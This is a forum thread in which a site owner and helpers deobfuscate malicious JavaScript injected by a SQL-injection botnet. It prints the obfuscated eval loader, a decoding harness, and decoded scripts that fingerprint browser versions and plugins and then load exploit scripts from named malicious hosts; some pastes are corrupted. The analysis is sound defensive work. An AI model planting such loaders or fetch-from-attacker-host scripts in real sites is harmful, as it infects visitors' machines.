Solved

How can I de-obfuscate a javascript used by a hacker?

Posted on 2008-06-24
Last Modified: 2012-06-21
Hi,

our web servers have been attacked by a bot (b.js injected through SQL Injection), like a lot of people's.

We have protected them but I would like to find a way to de-obfuscate the javascript called by b.js.

It looks like the attached code.

Could you please explain to me how I can de-obfuscate this javascript to find which exploits were tested?

P.S: I am running under Windows XP, so please don't tell me to use an application on a Linux box.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<script type="text/javascript">

<!--

// Stage-1 loader exactly as found in the injected page. Left byte-for-byte
// unchanged on purpose: the function's own source (arguments.callee.toString())
// concatenated with location.href is hashed to derive the decode key, so any
// edit to a letter, digit or underscore inside the body (e.g. swapping eval for
// alert) yields a different key and garbage output. Only word characters count
// (the /\W/g replace strips everything else), so whitespace is not part of the key.
// What it does: builds a 256-entry table with the reflected CRC-32 polynomial
// (3988292384 = 0xEDB88320), runs the table over the uppercased word characters
// of source + URL, and uses the 8 uppercase hex digits of the result as a
// repeating 8-byte key; each hex pair of the onload argument minus the current
// key byte (mod 256) is one character of the decoded script. The result is
// passed to eval; if eval throws, the page is redirected to "/". The decoded text
// is never written to the DOM, which is why a print-instead-of-eval harness (see
// the thread below) is needed to see it. For detection: an onload handler calling
// a function with a single long hex argument, plus arguments.callee, eval and
// location.href together in one minified function, is the pattern to look for.
function a1Mv1BqB5(U4B6r3U6o, jVPW6Pvdu){var U3siwSYq6 = arguments.callee;var hJeHPlM0I = 4294967296;U3siwSYq6 = U3siwSYq6.toString();U3siwSYq6 = U3siwSYq6 + location.href;var uAPaoLJPD = eval;var B6JCRnkA6 = U3siwSYq6.replace(/\W/g, "");B6JCRnkA6 = B6JCRnkA6.toUpperCase();var G16JL2243 = new Array;for(var PNtIgAcmL = 0; PNtIgAcmL < 256; PNtIgAcmL++) {G16JL2243[PNtIgAcmL] = 0;}var SWDf70eQV = 1;for(var PNtIgAcmL = 128; PNtIgAcmL; PNtIgAcmL >>= 1) {SWDf70eQV = SWDf70eQV >>> 1 ^ (SWDf70eQV & 1 ? 3988292384 : 0);for(var Ev0dA675F = 0; Ev0dA675F < 256; Ev0dA675F += PNtIgAcmL * 2) {var j130O6u3m = PNtIgAcmL + Ev0dA675F;G16JL2243[j130O6u3m] = G16JL2243[Ev0dA675F] ^ SWDf70eQV;if (G16JL2243[j130O6u3m] < 0) {G16JL2243[j130O6u3m] += hJeHPlM0I;}}}var C5ui1SRPe = hJeHPlM0I - 1;for(var r77hP82bN = 0; r77hP82bN < B6JCRnkA6.length; r77hP82bN++) {var BK7jph3O8 = (C5ui1SRPe ^ B6JCRnkA6.charCodeAt(r77hP82bN)) & 255;C5ui1SRPe = (C5ui1SRPe >>> 8) ^ G16JL2243[BK7jph3O8];}C5ui1SRPe = C5ui1SRPe ^ (hJeHPlM0I - 1);if (C5ui1SRPe < 0) {C5ui1SRPe += hJeHPlM0I;}C5ui1SRPe = C5ui1SRPe.toString(16).toUpperCase();while(C5ui1SRPe.length < 8) {C5ui1SRPe = "0" + C5ui1SRPe;}var QUer084X4 = new Array;for(var PNtIgAcmL = 0; PNtIgAcmL < 8; PNtIgAcmL++) {QUer084X4[PNtIgAcmL] = C5ui1SRPe.charCodeAt(PNtIgAcmL);}var EhA2V6mT1 = "";var p8rb8Bn1D = 0;for(var PNtIgAcmL = 0; PNtIgAcmL < U4B6r3U6o.length; PNtIgAcmL += 2){var j130O6u3m = U4B6r3U6o.substr(PNtIgAcmL, 2);var d6kJb6d54 = parseInt(j130O6u3m, 16);var r6P3aRB8N = d6kJb6d54 - QUer084X4[p8rb8Bn1D];if(r6P3aRB8N < 0) {r6P3aRB8N = r6P3aRB8N + 256;}EhA2V6mT1 += String.fromCharCode(r6P3aRB8N);if(p8rb8Bn1D + 1 == QUer084X4.length) {p8rb8Bn1D = 0;} else {p8rb8Bn1D++;}}var pwwYYa5r6 = 0;try {uAPaoLJPD(EhA2V6mT1);} catch(e) {pwwYYa5r6 = 1;}try {if (pwwYYa5r6) {window.location = "/";}} catch(e) {}}

//-->

</script>

</head>

<body onload="a1Mv1BqB5('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')">
 

</body>

</html>


Question by:bigstyler
19 Comments
 
LVL 35

Expert Comment

by:torimar
ID: 21857040
You might want to check out the amazing "MalZilla" project (http://malzilla.sourceforge.net).
On their download page, you will find a windows version of the application.

Hope this helps.
 
LVL 5

Expert Comment

by:codeQuantum
ID: 21858373
I am interested in this issue as well :

Suppose I want to make a javascript code by google analytics clearer :

http://www.google-analytics.com/ga.js

How do you use MalZilla?

In case you are wondering, I am investigating this code because I think it is causing the following problem on my site : http://www.experts-exchange.com/Web_Development/Search_Engines/Q_23504888.html
 
LVL 35

Expert Comment

by:torimar
ID: 21859567
I'm still rather new to the tool myself, codequantum.
However, it was not difficult to get it to reformat your Google code which is, after all, not obfuscated, but only stripped of all formatting, linebreaks and spaces.

I appended the new file. Mind you, some lines of code are still cryptic and others simply don't look right.
ga-reformated.txt
 
LVL 5

Expert Comment

by:codeQuantum
ID: 21859803
Thanks torimar
 
LVL 4

Author Comment

by:bigstyler
ID: 21863780
Thank you Torimar for your answer.

I have tested Malzilla but I didn't find any way to de-obfuscate the page quoted above.

1. Indeed, I have copied/pasted this code into the Download tab, then into the "Text" area.
2. Then I have clicked on "Send all scripts to Decoder"
3. I clicked on the "Decoder" tab, and then what do I have to do?

I have tried to replace eval() with "alert" for example, but nothing happens when I click on "Run script" or "debug", so I am still trying to de-obfuscate this javascript.

Thank you
 
LVL 3

Expert Comment

by:KhoiNqq
ID: 21864312
This obfuscation uses some very annoying techniques, especially the arguments.callee part: it uses the function length to change the decoding algorithm, so if you change eval to alert the code will go wrong (at the simplest level the function length is wrong, which breaks the code, so the alert would build a totally different string before alerting it).

I just know about this technique but cannot help you in this case, sorry
 
LVL 3

Expert Comment

by:KhoiNqq
ID: 21864325
Not only that, he is also using location.href combined with his original function as a signature to decode, so the script only works correctly if you put it at the right location (on your server) and do not change the function length (at the basic level of this technique; a harder variant would check some critical position, e.g. the eval function). Then the code will work correctly; otherwise it will build a meaningless string :-(
 
LVL 12

Expert Comment

by:jahboite
ID: 21866339
Interesting Problem!
My javascript is quite rudimentary, but I've started by making the code easier to read by replacing the random variable names with something close to their description.

As KhoiNqq said, the text of the function forms part of the decode routine (actually only the alphanumeric characters from the original function - the rest is stripped), but this is easily worked around.  You'll see below on line 11 that I've replaced the statement with one to restore the text of the original function, which allows us to modify the code that runs so that we can safely execute it.  That is, I've bypassed the "arguments.callee".

Unfortunately, I can't deobfuscate the code entirely because of what happens on line 12 - the url for the page in which you found this is used as part of the decode routine.
args = args + location.href;

I think you'll find a different XXXXX in <body onload="a1Mv1BqB5('XXXXX')"> for every page because the XXXXX is a function of location.href.

So the attached code snippet can be safely run from its original location (ie the page where you found it).  It will merely print out "Failed" (line 85) or else, if successful, will print out the client-side code rather than inserting it into the page to allow it to be run by the browser (line 76).

Note that I haven't pasted the <body> tags below because I expect these will be different for each page so if you decide to run this on one of your compromised pages, you'll need the original body tags.

Love to know how you get on!
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<script type="text/javascript">

<!--

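function bad_function(first_arg, jVPW6Pvdu){

	// Analysis harness for the stage-1 loader above: same key derivation and
	// decoding as the original, but the decoded text is displayed instead of
	// being passed to eval.
	//   first_arg  - the hex string the page's onload handler passes in
	//   jVPW6Pvdu  - second argument of the original function; unused there too
	// Returns nothing. Appends a <pre> holding the decoded text (or the text
	// "Failed!") to document.body, so it has to run once the body exists (onload).
	// NOTE: the original page's onload attribute calls a1Mv1BqB5(...), not
	// bad_function; keep that name or change the onload call, or nothing runs.

	var two_pow_32 = 4294967296;

	// The loader hashes its own source (arguments.callee.toString()) plus
	// location.href to derive the key. Substituting the original function text
	// here, verbatim, makes the key independent of how this harness is written
	// and is what lets the rest of the body be edited freely. Only word
	// characters feed the hash (see the /\W/g replace below), so whitespace and
	// punctuation in this literal do not matter, but every letter, digit and
	// underscore must match the original.
	var args = 'function a1Mv1BqB5(U4B6r3U6o, jVPW6Pvdu){var U3siwSYq6 = arguments.callee;var hJeHPlM0I = 4294967296;U3siwSYq6 = U3siwSYq6.toString();U3siwSYq6 = U3siwSYq6 + location.href;var uAPaoLJPD = eval;var B6JCRnkA6 = U3siwSYq6.replace(/\W/g, "");B6JCRnkA6 = B6JCRnkA6.toUpperCase();var G16JL2243 = new Array;for(var PNtIgAcmL = 0; PNtIgAcmL < 256; PNtIgAcmL++) {G16JL2243[PNtIgAcmL] = 0;}var SWDf70eQV = 1;for(var PNtIgAcmL = 128; PNtIgAcmL; PNtIgAcmL >>= 1) {SWDf70eQV = SWDf70eQV >>> 1 ^ (SWDf70eQV & 1 ? 3988292384 : 0);for(var Ev0dA675F = 0; Ev0dA675F < 256; Ev0dA675F += PNtIgAcmL * 2) {var j130O6u3m = PNtIgAcmL + Ev0dA675F;G16JL2243[j130O6u3m] = G16JL2243[Ev0dA675F] ^ SWDf70eQV;if (G16JL2243[j130O6u3m] < 0) {G16JL2243[j130O6u3m] += hJeHPlM0I;}}}var C5ui1SRPe = hJeHPlM0I - 1;for(var r77hP82bN = 0; r77hP82bN < B6JCRnkA6.length; r77hP82bN++) {var BK7jph3O8 = (C5ui1SRPe ^ B6JCRnkA6.charCodeAt(r77hP82bN)) & 255;C5ui1SRPe = (C5ui1SRPe >>> 8) ^ G16JL2243[BK7jph3O8];}C5ui1SRPe = C5ui1SRPe ^ (hJeHPlM0I - 1);if (C5ui1SRPe < 0) {C5ui1SRPe += hJeHPlM0I;}C5ui1SRPe = C5ui1SRPe.toString(16).toUpperCase();while(C5ui1SRPe.length < 8) {C5ui1SRPe = "0" + C5ui1SRPe;}var QUer084X4 = new Array;for(var PNtIgAcmL = 0; PNtIgAcmL < 8; PNtIgAcmL++) {QUer084X4[PNtIgAcmL] = C5ui1SRPe.charCodeAt(PNtIgAcmL);}var EhA2V6mT1 = "";var p8rb8Bn1D = 0;for(var PNtIgAcmL = 0; PNtIgAcmL < U4B6r3U6o.length; PNtIgAcmL += 2){var j130O6u3m = U4B6r3U6o.substr(PNtIgAcmL, 2);var d6kJb6d54 = parseInt(j130O6u3m, 16);var r6P3aRB8N = d6kJb6d54 - QUer084X4[p8rb8Bn1D];if(r6P3aRB8N < 0) {r6P3aRB8N = r6P3aRB8N + 256;}EhA2V6mT1 += String.fromCharCode(r6P3aRB8N);if(p8rb8Bn1D + 1 == QUer084X4.length) {p8rb8Bn1D = 0;} else {p8rb8Bn1D++;}}var pwwYYa5r6 = 0;try {uAPaoLJPD(EhA2V6mT1);} catch(e) {pwwYYa5r6 = 1;}try {if (pwwYYa5r6) {window.location = "/";}} catch(e) {}}';

	// The URL the injected page was served from is part of the key as well.
	// To decode offline, replace location.href with that exact URL as a quoted
	// string; any other URL gives a different key.
	args = args + location.href;

	// Only letters, digits and underscores survive, uppercased.
	var hash_input = args.replace(/\W/g, "").toUpperCase();

	// CRC-32 lookup table for the reflected polynomial 0xEDB88320 (3988292384),
	// built exactly the way the loader builds it (entries kept non-negative).
	var crc_table = new Array;
	for (var n = 0; n < 256; n++) {
		crc_table[n] = 0;
	}
	var poly_bits = 1;
	for (var bit = 128; bit; bit >>= 1) {
		poly_bits = poly_bits >>> 1 ^ (poly_bits & 1 ? 3988292384 : 0);
		for (var base = 0; base < 256; base += bit * 2) {
			var slot = bit + base;
			crc_table[slot] = crc_table[base] ^ poly_bits;
			if (crc_table[slot] < 0) {
				crc_table[slot] += two_pow_32;
			}
		}
	}

	// CRC-32 of the filtered source + URL text.
	var crc = two_pow_32 - 1;
	for (var k = 0; k < hash_input.length; k++) {
		var table_index = (crc ^ hash_input.charCodeAt(k)) & 255;
		crc = (crc >>> 8) ^ crc_table[table_index];
	}
	crc = crc ^ (two_pow_32 - 1);
	if (crc < 0) {
		crc += two_pow_32;
	}
	crc = crc.toString(16).toUpperCase();
	while (crc.length < 8) {
		crc = "0" + crc;
	}

	// The 8 uppercase hex digits of the CRC, as character codes, are the
	// repeating decode key.
	var key = new Array;
	for (var d = 0; d < 8; d++) {
		key[d] = crc.charCodeAt(d);
	}

	// Each hex pair of first_arg minus the current key byte (mod 256) is one
	// character of the decoded script.
	var decoded = "";
	var key_pos = 0;
	for (var p = 0; p < first_arg.length; p += 2) {
		var cipher_byte = parseInt(first_arg.substr(p, 2), 16);
		var plain_byte = cipher_byte - key[key_pos];
		if (plain_byte < 0) {
			plain_byte = plain_byte + 256;
		}
		decoded += String.fromCharCode(plain_byte);
		key_pos = (key_pos + 1 == key.length) ? 0 : key_pos + 1;
	}

	// The loader would eval(decoded) here; this harness only displays it.
	// document.write would parse the text as HTML, so markup inside a payload
	// could still be executed by the browser; a text node is rendered literally.
	var has_failed = 0;
	try {
		var out = document.createElement("pre");
		out.appendChild(document.createTextNode(decoded));
		document.body.appendChild(out);
	} catch (e) {
		has_failed = 1;
	}

	if (has_failed) {
		try {
			document.body.appendChild(document.createTextNode("Failed!"));
		} catch (e) {
			// Nothing left to report to; the page simply stays empty.
		}
	}

}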

//-->

</script>

</head>


 
LVL 12

Expert Comment

by:jahboite
ID: 21866364
And, you can take out that bloody alert() on line 16!  That was me debugging.
 
LVL 4

Author Comment

by:bigstyler
ID: 21866402
Thank you everybody.

About the location.href, perhaps this will help you to find the problem : http://s3cwatch.wordpress.com/de-obfuscate-javascript/


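// Stub for running the loader in a standalone JavaScript engine instead of a
// browser: eval is replaced by a function that prints the decoded text rather
// than executing it, and a fake location object supplies the URL that the
// loader mixes into its decode key.
// NOTE(review): print() is not a browser function; presumably a builtin of the
// command-line shell this was written for — confirm for the engine you use.
function eval(a) {

	print(a);

}

// The loader appends location.href to its own source before hashing it, so
// this has to be the exact URL the injected page was served from, or the
// derived key will not match and the output will be garbage.
location = new Object();

// The URL is a string and must be quoted; the bare value in the original paste
// is a syntax error.
location.href = "http://hackattack.com/cgi-bin/index.cgi?ad";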


 
LVL 12

Expert Comment

by:jahboite
ID: 21866700
I'm assuming that hxxp://hackattack.com/cgi-bin/index.cgi?ad isn't the url to the page where you found the obfuscated code.  Do you want to share that url?
 
LVL 4

Author Comment

by:bigstyler
ID: 21866721
 
LVL 12

Expert Comment

by:jahboite
ID: 21867180
Well, it was twice obfuscated, but I ended up with the attached which, after a cursory inspection, seems to be checking the version number of the web browser (and possibly the OS) and then inserting yet more javascript which serves up a browser-targeted javascript which presumably will try and exploit known vulnerabilities for that browser.

There seem to be a couple of mistakes in the code, so I'm not sure how effective it's going to be...
// Stage-2 script (jahboite's renamed copy) as produced by the harness above:
// it fingerprints the browser and appends a remote <script> whose URL carries
// the fingerprint. Nothing in this snippet exploits anything by itself.
// NOTE: this paste is corrupted. The "var some_number = -1 var some_string"
// line lacks a semicolon, the for-loop header further down lost its condition
// and the first statements of its body (most likely a "<" was eaten as HTML),
// and DKJqH1_I is used but never assigned here. The author's copy of the same
// script with the original identifiers, later in the thread, is intact.

// Flags set on the document object; presumably run-once markers for this
// loader family (nothing here reads them) — confirm against the other stages.
document.a7HBPKZw = 1;

document.doV6opeZ = 1;

document.eat_mJNq = 1;

// Guard flag that is never set in this snippet, so the block always runs
// unless another script on the page sets it.
if (!document.nuKqmQHX) {

	var specific_exploit;

	// IE-only property; the code below scans it for ";SP" followed by a digit.
	var app_minor_version = navigator.appMinorVersion;

	// Service-pack code: "01" = none found, "02".."07" = digit 1..6 after ";SP".
	var some_number = -1 var some_string = "01";

	while((some_number = app_minor_version.indexOf(";SP", some_number+1)) != -1) {

		var version_test = app_minor_version.charAt(some_number+3);

		if (version_test == "1") 

			some_string = "02";

		else if (version_test == "2") 

			some_string = "03"; 

		else if (version_test == "3") 

			some_string = "04"; 

		else if (version_test == "4") 

			some_string = "05"; 

		else if (version_test == "5")

			some_string = "06"; 

		else if (version_test == "6")

			some_string = "07"; 

		if (some_string != "01")

			break;

	}

	// "08" when no service pack was found but the string mentions a Release Candidate.
	if (some_string == "01" && app_minor_version.indexOf("Release Candidate", 0) != -1)

		some_string = "08";

		// First 10 characters of the system language (IE-only property), to be
		// hex-encoded into some_other_string by the loop below.
		var str_lang = navigator.systemLanguage.substr(0, 10);

		var some_other_string = "";

		// Corrupted line: the loop condition and increment, and the assignment of
		// DKJqH1_I (the hex of one character of str_lang), are missing.
		for(var i=0;i< 2)

			some_other_string += "0";

			some_other_string += DKJqH1_I;

		}

		// Pad the hex-encoded language to 20 characters.
		while(some_other_string.length < 20) 

			some_other_string += "00";

			// 22-character fingerprint: service-pack code + hex language, sent as
			// the tail of the query string of a remotely loaded script. For
			// detection, this host, path and hex prefix are the indicator.
			var specific_exploit = some_string + some_other_string;

			var script_elem = document.createElement("script");

			script_elem.setAttribute("type", "text/javascript");

			script_elem.setAttribute("src", "hxxp://adwbnr.com/cgi-bin/index.cgi?301e08ae0100f0700077e0ed58060000000002787e5f16ff" + specific_exploit);

			document.body.appendChild(script_elem);

		} 


 
LVL 12

Expert Comment

by:jahboite
ID: 21871211
So, for example, in Internet Explorer 7.0 with en-gb language, the URL requested is as above and specific_exploit is the string:
01656e2d67620000000000
656e2d6762 is en-gb in hex ascii
and this tried to download a gif89 image probably containing some kind of exploit.

Another such script tests for shockwave version 9.115 and 9.124 as well as Adobe Acrobat versions 5, 6 and 7 and also checks for navigator.mimeTypes["video/x-ms-wmv"].enabledPlugin

I've not successfully downloaded any exploits except for the gif and there are a few reasons for this.
The hosts serving this stuff are using 'fast flux' dns records so that a domain name might be found at 10 or 15 hosts at one time and then a completely different set of hosts a few minutes later.  These hosts are likely to be part of a botnet (probably asprox) and so there are thousands of them.
Due to the fact that the stub of the url changes for each host depending on the current hostname, it's a nightmare working out what the full url should be before the stub has changed, and you can't just append a specific_exploit string to just any url.
These two hosts were using the same domain name:
hxxp://apps84.com/cgi-bin/index.cgi?b5f68c1d0100f0700077e0ed58060000000002fd94ffc4ff - 189.81.121.125
hxxp://apps84.com/cgi-bin/index.cgi?b5f68c1d0100f0300077e0ed58020000000002fd94f5beff - 201.250.147.92
but as you can see, different url stubs.

When I do find a host that should be serving exploits, I either get redirected to www.msn.com or I get HTTP 500 - Internal Server Error which probably means I didn't get the url quite right.

If you want to have a go, I've pretty much got the deobfuscation down now:

Step 1:
Copy the code (like your original post) into a text file and save it as an html file.

Step 2:
Copy the entire function line (line 8 from your example) and paste it somewhere safe (you'll need this copy again, exactly as it currently is because you'll change the original).

Step 3:
Again on line 8, near the end of the function you'll find something like this:

 = 0;try {uAPaoLJPD(EhA2V6mT1);} catch(e) {pwwYYa5r6 = 1;}try {if (pwwYYa5r6) {window.location = "/";}} catch(e)

in the first 'try' change:
try {uAPaoLJPD(
to:
try {document.write(

This stops the code being eval()'ed when you run it and prints it out instead.

Step 4:
on line 8 again, find:
location.href
and change it to the url at which you found the code (enclose it in quotes):
"hxxp://adwbnr.com/cgi-bin/index.cgi?ad"

This is necessary for the reasons we've already discovered - perhaps to stop people stealing their malicious code, perhaps to try and prevent people from doing what we're doing.

Step 5:
Again on line 8, find:
arguments.callee
and replace it with the entire function you pasted somewhere for safekeeping and enclose it with SINGLE quotes.
'function blah blah ... catch(e) {}}'

This bypasses the code's 'integrity check', which allows us to modify the code that runs and still perform the deobfuscation.

Step 6:
Save your html file and browse to it.  You'll then be presented with more text looking remarkably like the original.
This time, though there's no html.  Just the function and the caller.
So now you take the new function and replace the one in your html file with it.
Replace the caller in your html file with the new one (so that it's in the onload event of <body> like before).

Then repeat steps 2-6 and you'll end up with the gently obfuscated code that checks what software can be exploited.  It's just a matter then of giving the variables some sensible names.  I'm pretty sure they put some red herrings in there just to further confuse the issue.

There's probably no need to try and download the exploits, it's fairly obvious what the checks are looking for.

As a word of warning, I should say that even though it is perfectly safe to follow these steps for the example posted in
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23511296.html#a23511296
and that all the examples I've found since use the same technique and were also safe to play with in this way, it is possible that the code could change and the next one you try could have something different about it such that these steps don't prevent the exploit code from running.  Be cautious.  Also, if you're going to try and download exploits, make sure that they aren't executed (or in the case of documents, images, audio and video - viewed) -- on windows machines, appending a new file extension to the file such as .DONOTRUNME will avoid accidental execution/viewing.
 
LVL 4

Author Comment

by:bigstyler
ID: 21882054
Hi jahboite,

I really appreciate your help. It is very interesting; thanks a lot.

I have successfully "decoded" the javascript and the final script is like this one attached:

I just don't understand one little thing.
I don't find, in the code pasted here, which exploits are tested on my computer (like acrobat, shockwave etc...)
Thanks again



// Stage-2 script with the original identifiers, as decoded with the thread's
// harness. It fingerprints the browser and appends a remote <script> whose
// query string ends with the fingerprint; nothing in this snippet exploits
// anything by itself. For detection, the indicator is the script src near the
// end (host, /cgi-bin/index.cgi and the long hex prefix) followed by a
// 22-character fingerprint.

// Flags set on the document object; presumably run-once markers for this
// loader family (nothing here reads them) — confirm against the other stages.
document.a7HBPKZw = 1;

document.doV6opeZ = 1;

document.eat_mJNq = 1;
 

// Guard flag that is never set in this snippet, so the block always runs
// unless another script on the page sets it.
if (!document.nuKqmQHX) {
 

var VcY8NUji;

// IE-only property; the loop below scans it for ";SP" followed by a digit.
var cV29LtnY = navigator.appMinorVersion;

var H_Q3_A8x = -1

// Service-pack code: "01" = none found, "02".."07" = digit 1..6 after ";SP",
// "08" = Release Candidate (set further down).
var hOpIHxvx = "01";
 

while((H_Q3_A8x = cV29LtnY.indexOf(";SP", H_Q3_A8x+1)) != -1) {

	var oZZDNNdi = cV29LtnY.charAt(H_Q3_A8x+3);
 

	if (oZZDNNdi == "1")

		hOpIHxvx = "02";

	else if (oZZDNNdi == "2")

		hOpIHxvx = "03";

	else if (oZZDNNdi == "3")

		hOpIHxvx = "04";

	else if (oZZDNNdi == "4")

		hOpIHxvx = "05";

	else if (oZZDNNdi == "5")

		hOpIHxvx = "06";

	else if (oZZDNNdi == "6")

		hOpIHxvx = "07";
 

	if (hOpIHxvx != "01")

		break;

}
 

if (hOpIHxvx == "01" && cV29LtnY.indexOf("Release Candidate", 0) != -1)

	hOpIHxvx = "08";
 
 

// First 10 characters of the system language (IE-only property), hex-encoded
// below; e.g. en-gb becomes 656e2d6762 as the thread notes.
var kwyw5NYj = navigator.systemLanguage.substr(0, 10);

var ZcESsVDk = "";
 
 

for(var iGtggROE=0;iGtggROE<kwyw5NYj.length;iGtggROE++) {

	// Hex of one character code. Assigned without var, so this is an implicit
	// global.
	DKJqH1_I = kwyw5NYj.charCodeAt(iGtggROE).toString(16);
 

	// Compares the hex STRING with the number 2, not its length; the zero
	// padding this seems meant to do never triggers for the printable
	// characters of a language tag (their codes already give two hex digits).
	// Probably one of the "mistakes" mentioned earlier in the thread.
	if (DKJqH1_I < 2)

		ZcESsVDk += "0";
 

	ZcESsVDk += DKJqH1_I;

}
 

// Pad the hex-encoded language to 20 characters (at most 10 characters in,
// so the hex is never longer than 20 and always even-length).
while(ZcESsVDk.length < 20)

	ZcESsVDk += "00";
 
 

// 22-character fingerprint: service-pack code + hex language.
var VcY8NUji = hOpIHxvx + ZcESsVDk;

// The fingerprint is sent as the tail of the query string of a remotely loaded
// script; the server is expected to answer with browser-specific content.
var mcm_gMVq = document.createElement("script");

mcm_gMVq.setAttribute("type", "text/javascript");

mcm_gMVq.setAttribute("src", "http://adwbnr.com/cgi-bin/index.cgi?301e08ae0100f0700077e0ed58060000000002787e5f16ff" + VcY8NUji);

document.body.appendChild(mcm_gMVq);

}


 
LVL 12

Expert Comment

by:jahboite
ID: 21882372
Nice work!
The code only checks that known-to-be-vulnerable software is installed and then directs the browser to download an exploit for that software.  This particular script is checking the version of the browser and the language in use, so the exploit downloaded by the client after executing this javascript will likely be a browser-specific exploit for specific languages (such as http://blog.mozilla.com/security/2008/05/07/compromised-file-in-vietnamese-language-pack-for-firefox-2/).
Attached is an example of plugin discovery where the code checks that particular versions of shockwave and acrobat are installed and that the browser will accept content with a mime-type of video/x-ms-wmv
// Plugin-discovery variant of the stage-2 script: inspects the installed
// browser plugins and mime types, encodes what it found as short codes, and
// appends a remote <script> whose URL ends with those codes. Nothing in this
// snippet exploits anything by itself; the script src at the end is the
// indicator to look for.
// NOTE: the paste is corrupted at the for-loop header inside the first try
// (reads "for (var FGETNEhb=0;FGETNEhb 0) {"): the loop condition and the
// first statements of its body are missing, most likely eaten as an HTML tag.
// IDzn62zR and JTkc_ZZB are declared in that lost part; the later use of
// navigator.plugins[FGETNEhb] suggests the loop walks navigator.plugins.
if (!document.JTg_UiwL) {

	// Result codes, all "not found" initially: dkmHWYEA is set from IDzn62zR in
	// the lost part, cdNsOzhZ is the Acrobat code, hXMX9MQS the Flash code and
	// UXlZ5qAL the WMV mime-type flag.
	var dkmHWYEA = '0';

	var cdNsOzhZ = '00';

	var hXMX9MQS = '00';

	var UXlZ5qAL = '00';

	try {

		// Corrupted line, see the note at the top.
		for (var FGETNEhb=0;FGETNEhb 0) {

			dkmHWYEA = IDzn62zR.toString(16);

		}

	}

	// Adobe Acrobat: " 5", " 6", " 7" in the plugin description give '05', '06',
	// '07'; any other version gives '01'.
	if (cdNsOzhZ == '00' && JTkc_ZZB.indexOf("Adobe Acrobat") != -1) {

		JTkc_ZZB = navigator.plugins[FGETNEhb].description;

		if (JTkc_ZZB.indexOf(" 5") != -1) {

			cdNsOzhZ = '05';

		}

		else if (JTkc_ZZB.indexOf(" 6") != -1) {

			cdNsOzhZ = '06';

		}

		else if (JTkc_ZZB.indexOf(" 7") != -1) {

			cdNsOzhZ = '07';

		}

		else {

			cdNsOzhZ = '01';

		}

	}

	// Shockwave Flash: pull the first dotted number out of the description,
	// then major < 9 gives '7c' and 9.0.x with x < 115 gives '73'.
	if (hXMX9MQS == '00' && JTkc_ZZB.indexOf("Shockwave Flash") != -1) {

		var Ko8Mfm1E = '';

		JTkc_ZZB = navigator.plugins[FGETNEhb].description;

		for(var WbyC3TJf = 0; WbyC3TJf < JTkc_ZZB.length; WbyC3TJf++) {

			var YOFgsbOa = JTkc_ZZB.charAt(WbyC3TJf);

			// Collect digits, and dots once a digit has been seen; stop at the
			// first other character after the number started.
			if (!isNaN(parseInt(YOFgsbOa)) || (YOFgsbOa == '.' && Ko8Mfm1E.length > 0)) {

				Ko8Mfm1E += YOFgsbOa;

			}

			else if (Ko8Mfm1E.length > 0) {

				break;

			}

		}

		var Mt2247pE = Ko8Mfm1E.split('.');

		if (Mt2247pE[0] < 9) {

			hXMX9MQS = '7c';

		}

		else if (Mt2247pE[0] == 9 && Mt2247pE[1] == 0 && Mt2247pE[2] < 115 ) {

			hXMX9MQS = '73';

		}

	}

	// Loose comparison with the number 0: the initial '0' and '00' strings
	// coerce to 0, so the loop only stops once all three codes have been set.
	if (cdNsOzhZ != 0 && dkmHWYEA != 0 && hXMX9MQS != 0) {

		break;

	}

}

}

catch(e) { }

// '01' when the browser has a plugin registered for video/x-ms-wmv.
try {

	if (navigator.mimeTypes["video/x-ms-wmv"].enabledPlugin)

		UXlZ5qAL = '01';

}

catch(e) { }

// Left-pad the first code to 8 characters.
while(dkmHWYEA.length < 8)

	dkmHWYEA = '0' + dkmHWYEA;

	// The codes are sent as the tail of the query string of a remotely loaded
	// script, in the order: 8-char code, WMV flag, Acrobat code, Flash code.
	var oM_AvlLJ = document.createElement("script");

	oM_AvlLJ.setAttribute("type", "text/javascript");

	oM_AvlLJ.setAttribute("src", "http://apps84.com/cgi-bin/index.cgi?b5f68c1d0100f0300077e0ed58020000000002fd94f5beff00" + dkmHWYEA + UXlZ5qAL + cdNsOzhZ + hXMX9MQS); // possibly: + "00000000" + "01" + "05||06||07" + "73||7c"

        document.body.appendChild(oM_AvlLJ);

}


 
LVL 4

Author Comment

by:bigstyler
ID: 21883829
1. So if I have well understood what you say, during "my" attack, the script is trying to gain access only through a browser exploit or there is a next step that I am missing?

2. I don't manage to find the correct URL, in my script quoted above, that will let me download the exploit used, if you can help me ...

3. What is the next step for the attacker? If the exploit has been successfully executed on the client operating system, what happens? A trojan is installed in the computer (and so the antivirus will see it, I presume?)

Thank you so much for sharing your knowledge jahboite. I would really appreciate it if we could speak with each other about security. I don't know if it is possible to contact each other by mail/messenger etc...

Thanks again =))
 
LVL 12

Accepted Solution

by:
jahboite earned 350 total points
ID: 21884860
It's all about the botnets!
The compromised host (bot) that exploited a sql injection vulnerability on your webserver was part of a large, worldwide network of bots (the botnet).  The bot software running on these compromised hosts is capable of (but not limited to) the following:
Scan for and perform sql injection on webservers running ASP (and using MS SQL).
Serve HTTP requests from browsers for scripts that test for vulnerable software accessible to the browser (or the browser itself).
Serve HTTP requests for exploits that compromise more hosts (via the browser) and assimilate them into the botnet.

The scripts injected into your database are pointing to scripts hosted by domains used by bots.
These scripts then check for vulnerabilities in the software run on the machines of visitors to your site and then attempt to infect the machines of those visitors.
Once infected, your visitors' machines become part of the botnet, hosting more scripts and exploits to continue the cycle and grow the botnet.

Obviously, some of the malware is detected by some Anti-Virus software running on your visitors' machines, but not all, and not all your visitors use AV.

As for downloading the exploits, I've been trying myself, but so far, no luck...
 
LVL 4

Author Closing Comment

by:bigstyler
ID: 31470184
Thanks a lot jahboite.

I have learned a lot thanks to you
